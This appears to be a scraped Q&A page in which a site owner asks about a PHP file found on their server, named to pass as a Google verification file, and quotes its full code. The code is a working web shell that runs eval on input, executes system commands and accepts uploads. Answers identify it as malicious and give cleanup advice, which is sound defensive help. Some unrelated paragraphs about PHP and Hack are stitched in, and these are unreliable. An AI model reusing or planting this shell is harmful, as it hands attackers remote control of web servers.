Menu
I recently found 4 bizarre files on my server (that I didn't upload). The filename were like this: goog1e7a20543b128921.php
And here's the code that was inside them:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Do you have any idea what this code is supposed to do..? Should I start to panic..?
Thanks.
283
Web Hacking Techniques: Hypertext Preprocessor or PHP is a server-side programming language used to build websites. Understanding PHP will help hackers understand web hacking techniques better. Server-Side Scripting: PHP is used in server-side scripting.
Yes, of course they could - if the server is penetrated then any file on it is visible. Save this answer. Show activity on this post. Yes, it's entirely possible for someone to hack a server, via an exploit, or by stealing your password, or via buggy code you or others have written, or a number of different ways.
Hack code is acutally compiled to an intermediary language which is what is even processed by the server. This in its sense makes Hack faster than PHP is execution. Though PHP codes can also be written in Hack which makes them interoperation, Hack comes with a difference in its own syntax.
Yep, this is malicious code. This shell script will allow to execute code as well as upload any file is the attacker knows the parameters passed to it. I recommend searching all files for that code, verify file permission and change your passwords just in case.
128
I would suggest you to use the HTML Purifier or OWASP to make things a lot secure.
You must disable the eval construct if you are not using that (and you shouldn't unless you really need to).
Analyze the server settings for any security holes with:
PHPSecInfo
(source: phpsec.org)
41
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
